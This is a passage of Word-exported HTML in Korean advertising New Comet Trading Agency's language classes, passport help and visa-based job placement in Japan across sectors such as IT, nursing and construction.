style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어려움을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">겪지</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">않도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직장에 사용하는 기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어 수업들을 교육 시킴</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본으로 연수비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">도쿠테이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기노 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Tokutei Ginou) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자로 취업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">희망하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분들 위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">전통문화와</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">풍속을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">익히도록 필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">코스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육 시키고 취직을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> N3, N2(JLPT, JFT, NAT-Test, Top J)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격하는 분들이</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Work Visa </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인</span><o:p></o:p></li></ol><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">번역</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; • IT&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">엔지니어링</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Civil</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Mechanical</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">, EP, EC, Auto CAD&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">)</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">간호지원</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업으로 일본으로 가고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶다면</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해당</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">학당으로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp;New Comet Trading Agency</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다음</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업체를 훈련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Training Visa)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 가고 싶은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자매를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비 &nbsp; &nbsp; 스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">주선하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자동차</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수리</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">집</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">짓기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">식품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌀</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">매장</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운영</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">호텔</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비즈니스</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">의류</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 